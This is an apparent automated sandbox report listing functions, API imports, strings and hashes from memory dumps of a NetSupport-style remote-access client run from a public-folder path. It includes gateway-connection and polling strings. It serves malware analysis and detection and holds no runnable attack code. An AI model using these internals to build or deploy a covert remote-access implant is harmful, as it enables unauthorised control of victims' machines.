Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$506407$C:\Users\Public\Netstat\Support\$C:\Users\Public\Netstat\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 3160247386-192133374
Opcode ID: c51107e4baa493d82e69265bde6dfb213c05a2a8fd6dc4dfa0e5cd014c9599df
Instruction ID: 0dee276890cdb34187167312b63104ddfd4d8682cb2b258eb1bb316ee71beeed
Opcode Fuzzy Hash: c51107e4baa493d82e69265bde6dfb213c05a2a8fd6dc4dfa0e5cd014c9599df
Instruction Fuzzy Hash: 2DD1B4F0A04305AFDB10AF6E8CC695A7BF8EB4A34AF55492AE405D7F41D630AC448F9D

Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11144EA0: GetLastError.KERNEL32(?,013FB8D8,000000FF,?), ref: 11144ED5
Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,013FB8D8,000000FF,?), ref: 11144EE5

_fgets.LIBCMT ref: 11061DC2
_strpbrk.LIBCMT ref: 11061E29
_fgets.LIBCMT ref: 11061F2C
_strpbrk.LIBCMT ref: 11061FA3
__wcstoui64.LIBCMT ref: 11061FBC
_fgets.LIBCMT ref: 11062035
_strpbrk.LIBCMT ref: 1106205B

Strings

?starT, xrefs: 11062771, 1106277D
expiry, xrefs: 11062730
_License, xrefs: 11062356, 11062414, 1106242E, 110625B6, 11062620, 1106263B, 11062657, 11062751, 11062970, 11062A58
Expired, xrefs: 1106296B
licensee, xrefs: 11062A53
defaults, xrefs: 11062116
%c%04d%s, xrefs: 11062184
_checksum, xrefs: 1106240F
enforce, xrefs: 11062136
product, xrefs: 11062652
?expirY, xrefs: 11062768
/- , xrefs: 110627FE, 11062831, 11062864
_version, xrefs: 11062429
cd_install, xrefs: 1106261B
start, xrefs: 11062739, 11062750
ACM, xrefs: 11062697
%s.%04d.%s, xrefs: 110622A9
shrink_wrap, xrefs: 11062636
_include, xrefs: 110621C9
Client, xrefs: 11062262, 110622A4
inactive, xrefs: 110625B1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
Opcode Fuzzy Hash: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,759223A0), ref: 111435A3
LoadLibraryA.KERNEL32(?), ref: 111435EC
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
GetModuleHandleA.KERNEL32(?), ref: 1114361A
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC

Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E

Strings

SymGetSymFromAddr, xrefs: 111436BD
IMAGEHLP.DLL, xrefs: 1114360E, 11143613, 11143619
SymSetOptions, xrefs: 111436A7
SymGetModuleInfo, xrefs: 111436B2
SymMatchFileName, xrefs: 11143665
SymGetLineFromAddr, xrefs: 11143628
DBGHELP.DLL, xrefs: 111435FF, 11143604
MiniDumpWriteDump, xrefs: 111436D3
SymLoadModule, xrefs: 11143686
SymGetLineNext, xrefs: 1114364F
SymGetLineFromName, xrefs: 11143647
SymGetLinePrev, xrefs: 1114365A
SymCleanup, xrefs: 1114367B
SymGetOptions, xrefs: 1114369C
StackWalk, xrefs: 11143673
SymInitialize, xrefs: 11143691
dbghelp.dll, xrefs: 111435C8
SymFunctionTableAccess, xrefs: 111436C8

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

Function 6C5DA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852

EnterCriticalSection.KERNEL32(6C61B898,?,00000000,00000000), ref: 6C5DAA11
LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA58
LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA68
LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA94
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C5DAB0B
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB4E
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB5A
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB8E
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABB1
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABE3
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC18
WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC21
closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC29
htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC65
WSASetBlockingHook.WSOCK32(6C5D63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC76
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC8F
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC96
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC9C
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DACFD
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD04
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD0A
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD45
EnterCriticalSection.KERNEL32(6C61B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD4F
InitializeCriticalSection.KERNEL32(-6C61CB4A), ref: 6C5DADE6

Part of subcall function 6C5D8FB0: _memset.LIBCMT ref: 6C5D8FE4
Part of subcall function 6C5D8FB0: getsockname.WSOCK32(?,?,00000010,?,03682EB0,?), ref: 6C5D9005

getsockname.WSOCK32(00000000,?,?), ref: 6C5DAE4B
LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAE60
GetTickCount.KERNEL32 ref: 6C5DAE6C
InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DAE7A

Strings

Cannot connect to gateway %s, error %d, xrefs: 6C5DACA6
Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C5DAD14
*TcpNoDelay, xrefs: 6C5DABB8
Connect error to %s using hijacked socket, error %d, xrefs: 6C5DAB17

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 692187944-2561115898
Opcode ID: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
Instruction ID: fb70bedb50f581ab446862bef5ac2d3b9a14edd6e83d34ccd58adfe83e01b611
Opcode Fuzzy Hash: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
Instruction Fuzzy Hash: 5EE18F71A01219DFDB14DF68CC80BDEB3B5EB88305F1141AAE91A97A80DB70AE49CF55

Function 11139090 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 111390C7
IsWindow.USER32(000404A0), ref: 11139125
IsWindowVisible.USER32(000404A0), ref: 11139133
IsWindowVisible.USER32(000404A0), ref: 1113916B
GetForegroundWindow.USER32 ref: 11139186
EnableWindow.USER32(000404A0,00000000), ref: 111391A0
EnableWindow.USER32(000404A0,00000001), ref: 111391BC
SetForegroundWindow.USER32(00000000), ref: 111391CB
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
IsWindowVisible.USER32(00000000), ref: 11139218
IsWindowVisible.USER32(000404A0), ref: 11139248
IsIconic.USER32(000404A0), ref: 11139255
GetForegroundWindow.USER32 ref: 1113925F

Part of subcall function 11131210: ShowWindow.USER32(000404A0,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234

Part of subcall function 11131210: ShowWindow.USER32(000404A0,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246

SetForegroundWindow.USER32(00000000), ref: 11139285
EnableWindow.USER32(000404A0,00000001), ref: 11139294
GetLastError.KERNEL32 ref: 11139353
GetLastError.KERNEL32 ref: 111393CB
GetTickCount.KERNEL32 ref: 11139678
GetTickCount.KERNEL32 ref: 11139699

Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8

FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734

Strings

HideWhenIdle, xrefs: 11139154
File <%s> doesnt exist, e=%d, xrefs: 11139357, 111393CF
Reactivate main window, xrefs: 11139179
Shell_TrayWnd, xrefs: 11139204
Audio, xrefs: 11139455
HookDirectSound, xrefs: 11139450
NeedsReinstall, xrefs: 11139636
MainWnd = %08x, visible %d, valid %d, xrefs: 1113913D
ShowNeedsReinstall in 15, user=%s, xrefs: 1113966B
disableRunplugin, xrefs: 111392D8
Client, xrefs: 11139159, 111392DD, 1113963B

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
API String ID: 2511061093-2542869446
Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51

Function 6C5D91F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D924C
WSAGetLastError.WSOCK32(00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D925B
GetTickCount.KERNEL32 ref: 6C5D9274
Sleep.KERNEL32(00000001,00000000,?,a3^l,00000000,00000000,?,00000007), ref: 6C5D92A8
GetTickCount.KERNEL32 ref: 6C5D92B0
Sleep.KERNEL32(00000014), ref: 6C5D92BC

Strings

ReadSocket - Would block, xrefs: 6C5D928A
ReadSocket - Connection has been closed by peer, xrefs: 6C5D92E0
*RecvTimeout, xrefs: 6C5D927B
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5D9226
a3^l, xrefs: 6C5D9244
ReadSocket - Error %d reading response, xrefs: 6C5D92F7
hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C5D922B

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CountSleepTick$ErrorLast
String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3^l$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 2495545493-3425134272
Opcode ID: 33e875e09022cfc04a646acb22b40cdd98fc642f8d20e01b6c4bc488a390689e
Instruction ID: b6b82bb0c7a53810def9def3cfbeb8ec5dc44364cda453f3f9bd56f1836d49ea
Opcode Fuzzy Hash: 33e875e09022cfc04a646acb22b40cdd98fc642f8d20e01b6c4bc488a390689e
Instruction Fuzzy Hash: 4F31B175E04308EFDB00DFADDC85B8EB3B4EB85326F014959E909D7E40EB31A9548B99

Function 6C5E3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,939E354D,1038AB42,939E34B3,FFFFFFFF,00000000), ref: 6C5E31E2
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E31EC
GetSystemTime.KERNEL32(?,1038AB42,939E34B3,FFFFFFFF,00000000), ref: 6C5E322A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C60ECB0), ref: 6C5E3234
EnterCriticalSection.KERNEL32(6C61B898,?,939E354D), ref: 6C5E32BE
LeaveCriticalSection.KERNEL32(6C61B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C5E32D3
GetCurrentThreadId.KERNEL32 ref: 6C5E334D

Part of subcall function 6C5EBA20: __strdup.LIBCMT ref: 6C5EBA3A

Part of subcall function 6C5EBB00: _free.LIBCMT ref: 6C5EBB2D

Strings

INFO=1, xrefs: 6C5E3304
ACK=1, xrefs: 6C5E3312
CMD=POLL, xrefs: 6C5E32F4
1.1, xrefs: 6C5E3240, 6C5E324A

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: 4b614711c9917101a9c2084e4b2f08b331ea9d62280805306bc76c0680d4c0c3
Instruction ID: af380195d1e21f30bdfc9e1bba848f2f398b1c5eec60eda308c213ca68385834
Opcode Fuzzy Hash: 4b614711c9917101a9c2084e4b2f08b331ea9d62280805306bc76c0680d4c0c3
Instruction Fuzzy Hash: AC617472904208EFCB14DFA8DC85EDEB7B9FF89305F14451AE416A3B50EB34A908CB55

Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11115BC5
CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
CoUninitialize.COMBASE(00000000), ref: 11115CD1

Strings

SHGetSettings, xrefs: 11115C10
SHELL32.DLL, xrefs: 11115BF5

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61

Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110734E0
_memset.LIBCMT ref: 11073659

Strings

_License, xrefs: 110734A1
serial_no, xrefs: 1107349C
NBCTL32.DLL, xrefs: 11073595

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
